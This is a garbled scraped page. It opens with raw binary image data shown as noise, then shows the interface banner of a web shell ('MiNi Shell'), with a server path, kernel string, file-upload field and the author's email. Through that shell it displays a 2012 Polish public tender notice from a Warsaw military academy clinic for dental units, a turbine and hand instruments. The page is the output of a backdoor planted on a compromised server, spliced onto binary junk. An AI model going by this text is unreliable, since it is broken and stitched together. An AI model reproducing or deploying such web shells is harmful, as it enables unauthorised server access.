JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120910/338428-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu stomatologicznego do Przychodni Lekarskiej WAT z podziałem     na 4 pakiety:
Pakiet 1: 4 zestawy stomatologiczne: unity wraz z fotelami;
Pakiet 2: Turbina 1 szt;
Pakiet 3: 100 szt. upychadeł z główkami kulistymi o różnych numerach
Pakiet 4: 6 szt. dźwigni prostych o różnych numerach.</b><br>
<b>Numer ogłoszenia: 338428 - 2012; data zamieszczenia: 10.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przychodnia Lekarska Wojskowej Akademii Technicznej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kartezjusza 2, 01-480 Warszawa, woj. mazowieckie, tel. 022 6838281, 6838283, faks 022 6838224.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plwat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu stomatologicznego do Przychodni Lekarskiej WAT z podziałem     na 4 pakiety:
Pakiet 1: 4 zestawy stomatologiczne: unity wraz z fotelami;
Pakiet 2: Turbina 1 szt;
Pakiet 3: 100 szt. upychadeł z główkami kulistymi o różnych numerach
Pakiet 4: 6 szt. dźwigni prostych o różnych numerach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia w pakiecie 1 jest dostawa 4 szt. zestawów stomatologicznych (unity wraz z fotelami), wyprodukowanych w 2012 r. przez jednego producenta, fabrycznie nowych. Wymagania Zamawiającego, w zakresie parametrów technicznych i warunków gwarancji, traktowanych jako graniczne oraz parametrów ocenianych, zawarte są w Zał. 1 i 2 do SIWZ. 
Przedmiotem  zamówienia:
a. w pakiecie 2 jest dostawa: 1 turbiny; 
b. w pakiecie 3 dostawa - 100 szt. upychadeł z główkami kulistymi o różnych numerach (10 szt. o numerze 1; po 40 szt. o numerach  2 i 3;  10 szt. o numerze 4); 
c. w pakiecie 4 - dostawa 6 szt. dźwigni prostych ( 3 szt. o nr 2 i  3 szt. dźwigni  prostych o nr 3). 
Wykaz zamawianego drobnego sprzętu stomatologicznego w ramach pakietów 2, 3, i 4 wraz z wymaganiami zawiera Zał. Nr 3 do SIWZ. 
Oferta na pakiet 1 stanowi Załącznik Nr 4 do SIWZ, oferta na pakiet  2, 3, 4  stanowi Załącznik Nr 5 do SIWZ.
Łącznie z ofertą, Oferent zobowiązany jest do złożenia dokumentów w języku polskim w wymaganej formie pisemnej zgodnie z wykazem dla każdego pakietu, podanym w rozdziale IX SIWZ.
Dla dostawy sprzętu stomatologicznego opracowano 2  projekty umów, dla pakietu 1 w Zał. Nr 9, dla pakietów 2, 3 i 4 w Zał. Nr 10.
Termin dostawy sprzętu stomatologicznego wymienionego w czterech pakietach wynosi 14 dni roboczych od dnia podpisania umowy.
WYMAGANIA  ZAMAWIAJĄCEGO w zakresie Pakietu I - 4 zestawy stomatologiczne (unity+fotele): 
1. Wykonawcy zainteresowani udziałem w postępowaniu przetargowym w zakresie pakietu 1, przed złożeniem oferty, powinni zapoznać się z rozmieszczeniem przyłączy w gabinetach stomatologicznych, w których została przewidziana instalacja nowych zestawów stomatologicznych. Zamawiający zastrzega, że instalacja nowych unitów musi przebiegać bez przeróbek istniejącej instalacji i podłączeń, bez naruszania infrastruktury gabinetów 306 a,b; 307a,b (gabinety po modernizacji i remoncie). 
2. Na obejrzenie gabinetów można umówić się telefonicznie: tel. (22) 683-82-60; kom. 692-460-762;  tel. (22) 683-82-22; faks (022) 683 82 24.
3. Wykonawca na swój koszt i ryzyko, zapewni opakowanie, transport, przeprowadzi instalację, montaż i uruchomienie dostarczonego sprzętu.
4. Wykonawca zobowiązuje się do przeszkolenia w siedzibie Zamawiającego personelu medycznego zatrudnionego u Zamawiającego w wymiarze gwarantującym sprawną obsługę i pełne wykorzystanie możliwości sprzętu.
5. Wykonawca zapewni gwarancję i reakcję serwisu gwarancyjnego i pogwarancyjnego wg podanych przez siebie terminach wg  Zał. Nr 2. 
6. Wykonawca zobowiązuje się dokonać wymiany całego sprzętu na fabrycznie nowy w sytuacji, gdy 3 podzespoły urządzenia zostaną poddane naprawie gwarancyjnej. 
7. Wykonawca zobowiązuje się zapewnić pogwarancyjny odpłatny serwis przez okres min. 10 lat.
8. Wykonawca zobowiązuje się zapewnić możliwość zakupu części zamiennych przez okres 10 lat..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w zakresie Pakietu 1 przewiduje możliwość udzielenia zamówienia uzu-pełniającego w zakresie dodatkowego wyposażenia zamawianych zestawów stomatologicznych do 20% wartości zamówienia podstawowego, zgodnie z art. 67, ust. l pkt 7 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.24.00-6, 33.19.24.10-9, 33.13.60.00-2, 33.13.10.00-7, 33.13.11.23-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium tylko do zabezpieczenia ofert składanych w zakresie tylko pakietu 1.

1. Wartość wadium dla pakietu 1 wynosi 7 200,00 zł.
2. Brak potwierdzenia wniesienia wadium, będzie skutkował wykluczeniem Wykonawcy (art. 24 ust. 2, p. 2 ustawy Pzp). (tylko dla pakietu 1)
3. Wadium wnosi się przed upływem terminu składania ofert na pakiet 1.
4. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsię-biorczości (Dz. U.  z 2007 r. Nr 42, poz. 275 z późn. zm.).
5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego tj. : PKO SA 35 1240 2034 1111 0000 0307 9487</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 6.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uwaga tylko dla pakietu 1: 
Złożenie wykazu wykonania dostawy min. 12 szt. unitów wraz z fotelami w okresie ostatnich 3 lat,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości min. 50 000 zł  każda, wraz z co najmniej 3 referencjami) (wg wzoru Zał. Nr 8).
         Jeżeli Wykonawca, polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest do złożenia pisemnego zobowiązania się tych podmiotów do faktycznego udziału w realizacji  zamówienia w charakterze podwykonawców w okresie obowiązywania umowy (art. 26 ust. 2 b ustawy Pzp).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 6.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 6.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uwaga tylko dla pakietu 1: 
Złożenie opłaconej polisy OC (deliktowej i kontraktowej), a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o sumie gwarancyjnej na jedno i wszystkie zdarzenia nie mniejszej niż 250 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dla ofert składanych w zakresie pakietu 1, w celu potwierdzenia, że oferowane dostawy i usługi odpowiadają wymaganiom określonym przez zamawiającego oraz ustawy z dnia 20 maja 2010 r o wyrobach medycznych (Dz. U. z 2010 r., Nr 107, poz. 679), zamawiający wymaga od wykonawcy następujących dokumentów w języku polskim: 
1)  Dokumentów producenta zestawu stomatologicznego (unit + fotel), potwierdzających autoryzację Wykonawcy na terenie Polski w zakresie sprzedaży. 
2) W zakresie serwisu gwarancyjnego i pogwarancyjnego, wykonawca zobowiązany jest podać listę uprawnionych podmiotów, wykonujących usługi serwisowe w imieniu producenta (autoryzowanego przedstawiciela czy importera), zgłoszonych do Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobój-czych;
3) Dokumentacji technicznej lub materiałów informacyjnych, zawierających pełne dane techniczne i parametry użytkowe, potwierdzające spełnienie wymagań Za-mawiającego odnośnie parametrów granicznych i ocenianych, 
4) Certyfikat CE, (Certyfikaty CE); ewentualnie zgłoszenie do rejestru wyrobu me-dycznego, oznaczonego znakiem zgodności CE, dla którego wystawiono deklarację zgodności; 
5) Inne wymagane dokumenty to: Instrukcja obsługi sprzętu i instrukcja serwisowa; oprócz formy pisemnej, pożądane w formie elektronicznej (płyty CD lub dyskietki)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.plwat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZYCHODNIA LEKARSKA WOJSKOWEJ AKADEMII TECHNICZNEJ 
SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ
ul. Kartezjusza 2, pok. 411  
01 - 480 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2012 godzina 09:00, miejsce: PRZYCHODNIA LEKARSKA WOJSKOWEJ AKADEMII TECHNICZNEJ 
SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ
ul. Kartezjusza 2, pok. 411  
01 - 480 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa 4 szt. zestawów stomatologicznych (unity wraz z fotelami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 4 szt. zestawów stomatologicznych (unity wraz z fotelami), wyprodukowanych w 2012 r. przez jednego producenta, fabrycznie nowych. Dokładniejszy opis przedmiotu zamówienia, zawierający wymagania Zamawiającego, w zakresie parametrów technicznych i warunków gwarancji, traktowanych jako graniczne oraz parametrów ocenianych, zawarty jest w Załącznikach: Nr 1 i Nr 2 do SIWZ.  
 WYMAGANIA  ZAMAWIAJĄCEGO :
1. Wykonawcy zainteresowani udziałem w postępowaniu przetargowym w zakresie pakietu 1, przed złożeniem oferty, powinni zapoznać się z rozmieszczeniem przyłączy w gabinetach stomatologicznych, w których została przewidziana instalacja nowych zestawów stomatologicznych. Zamawiający zastrzega, że instalacja nowych unitów musi przebiegać bez przeróbek istniejącej instalacji i podłączeń, bez naru-szania infrastruktury gabinetów 306 a,b; 307a,b (gabinety po modernizacji i remoncie). 
2. Na obejrzenie gabinetów można umówić się telefonicznie: dr Adam Stanulewicz, tel. (22) 683-82-60; kom. 692-460-762;  Kierownik Sekcji Sprzętu Medycznego i Zaopa-trzenia - mgr inż. Jarosław Zintek  tel. (22) 683-82-22; faks (022) 683 82 24.
3.  Wykonawca na swój koszt i ryzyko, zapewni opakowanie, transport, przeprowadzi instalację, montaż i uruchomienie dostarczonego sprzętu.
4. Wykonawca zobowiązuje się do przeszkolenia w siedzibie Zamawiającego personelu medycznego zatrudnionego u Zamawiającego w wymiarze gwarantującym sprawną obsługę i pełne wykorzystanie możliwości sprzętu.
5. Wykonawca zapewni gwarancję i reakcję serwisu gwarancyjnego i pogwarancyjnego wg podanych przez siebie terminach wg  Zał. Nr 2. 
6. Wykonawca zobowiązuje się dokonać wymiany całego sprzętu na fabrycznie nowy w sytuacji, gdy 3 podzespoły urządzenia zostaną poddane naprawie gwarancyjnej. 
6. Wykonawca zobowiązuje się zapewnić pogwarancyjny odpłatny serwis przez okres min. 10 lat.
7. Wykonawca zobowiązuje się zapewnić możliwość zakupu części zamiennych przez okres 10 lat..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.24.00-6, 33.19.24.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Warunki techniczne - 45</li>
<li>3. Warunki gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa 1 turbiny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Turbina z możliwością szybkiej zmiany instrumentu:szybkozłączka  
Wielodrożny spray;
Mocowanie wiertła systemem push button chuck;
Możliwość sterylizacji w autoklawie; 
Turbina ze światłem LED spray,
Gwarancja 24 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.60.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa - 100 szt. upychadeł z główkami kulistymi o różnych numerach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UPYCHAŁA KULISTE:

Ilość: szt.  łącznie: 100 
W tym:
10 szt. o numerze 1; 
po 40 szt. o numerach  2 i 3;  
10 szt. o numerze 4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa 6 szt. dentystycznych dźwigni prostych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DŹWIGNIE PROSTE OSTRE (Bein):

Ilość: szt. łącznie 6, 
  W tym:
3 szt. o numerze 2; 
3 szt. o numerze  3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.11.23-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com